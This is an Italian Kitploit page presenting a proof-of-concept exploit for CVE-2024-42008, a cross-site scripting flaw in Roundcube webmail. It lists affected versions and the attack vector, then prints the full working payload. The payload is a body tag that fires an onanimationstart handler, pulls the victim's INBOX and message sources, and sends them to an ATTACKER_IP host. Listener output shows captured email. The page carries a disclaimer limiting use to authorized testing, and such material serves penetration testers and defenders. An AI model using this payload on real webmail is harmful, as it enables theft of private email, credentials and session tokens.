Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!
Roundcube-CVE-2024-42008-POC — Exploit proof-of-concept per CVE-2024-42008, una vulnerabilità Cross-Site Scripting nella webmail RoundCube. Consegna payload XSS tramite moduli di contatto per rubare email, credenziali e token di sessione in ambienti di test di penetrazione autorizzati. | Kitploit
Exploit proof-of-concept per CVE-2024-42008, una vulnerabilità Cross-Site Scripting nella webmail RoundCube. Consegna payload XSS tramite moduli di contatto per rubare email, credenziali e token di sessione in ambienti di test di penetrazione autorizzati.
Questo repository contiene un exploit proof-of-concept per CVE-2024-42008, una vulnerabilità Cross-Site Scripting (XSS) nell'applicazione webmail RoundCube. Questo exploit è progettato per scopi educativi e ambienti di penetration testing controllati come HackTheBox.
Dettagli della vulnerabilità
Riepilogo di CVE-2024-42008
CVE ID: CVE-2024-42008
Tipo: Cross-Site Scripting (XSS)
Punteggio CVSS: Alto
Versioni interessate:
RoundCube ≤ 1.5.7
RoundCube 1.6.x ≤ 1.6.7
Versioni corrette: 1.5.8, 1.6.8+
Dettagli tecnici
La vulnerabilità risiede in rcmail_action_mail_get->run() e consente a un attaccante remoto di eseguire JavaScript arbitrario nel browser della vittima. Il difetto deriva da una validazione insufficiente dell'input durante l'elaborazione del contenuto delle email, in particolare nella gestione delle animazioni CSS e dei contesti di esecuzione JavaScript.
Vettore di attacco principale:
Contenuto HTML dannoso iniettato tramite moduli di contatto o messaggi di posta elettronica
Proprietà di animazione CSS utilizzate per attivare l'esecuzione di JavaScript
I gestori di eventi onanimationstart aggirano i filtri dei contenuti
Il payload JavaScript viene eseguito nel contesto dell'applicazione webmail
Impatto
Uno sfruttamento riuscito consente agli attaccanti di:
Rubare le email della vittima dalla casella di posta (INBOX) e da altre cartelle
Esfiltrare i metadati delle email (UID, elenchi di messaggi)
Accedere al codice sorgente delle email e agli allegati
Inviare email dall'account della vittima
Raccogliere credenziali di accesso e token di sessione
Eseguire azioni per conto della vittima
Analisi dello script exploit
Architettura dello script
L'exploit è composto da tre componenti principali:
Consegna del payload XSS: invia HTML dannoso tramite modulo di contatto
Server HTTP: resta in ascolto dei dati esfiltrati
Elaborazione dei dati: cattura e registra le email rubate
Analisi del payload
root@kitploit:~
// The core XSS payload uses CSS animations to trigger JavaScript
<body title="bgcolor=foo" name="bar style=animation-name:progress-bar-stripes onanimationstart=
// 1. Fetch email list from victim's INBOX
fetch('/?_task=mail&_action=list&_mbox=INBOX&_page=&_remote=1')
.then(r=>r.text())
.then(t=>{
// 2. Extract email UIDs using regex
[...t.matchAll(/this\\.add_message_row\\((\\d+),/g)].forEach(m=>{
// 3. For each email, fetch full source
fetch(`/?_task=mail&_uid=${m[1]}&_mbox=INBOX&_action=viewsource`)
.then(r=>r.text())
.then(data=>{
// 4. Exfiltrate email data to attacker server
fetch(`http://ATTACKER_IP:PORT/?data=${encodeURIComponent(data)}`)
})
})
})
; foo=bar">
Caratteristiche principali
Operazione continua: può inviare payload a intervalli regolari
Modalità stealth: impronta minima e gestione degli errori
Registrazione dei dati: cattura e archiviazione automatica delle email esfiltrate
Modalità di debug: supporto proxy per l'analisi del traffico
Configurabile: molteplici opzioni da riga di comando
[+] Listening on 10.10.14.209:8001 for exfiltrated data...
[2024-07-09 10:30:15] POST Request Sent! Status Code: 200
[+] 📩 Captured Email Data:
Return-Path: <[email protected]>
Received: from localhost (localhost [127.0.0.1])
...
[Email content]
--------------------------------------------------
[+] 🔥 Email data saved to emails.log
Esclusione di responsabilità
Questo codice è fornito esclusivamente per scopi educativi e test di penetrazione autorizzati. Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo software. Assicurati sempre di avere la dovuta autorizzazione prima di testare qualsiasi sistema.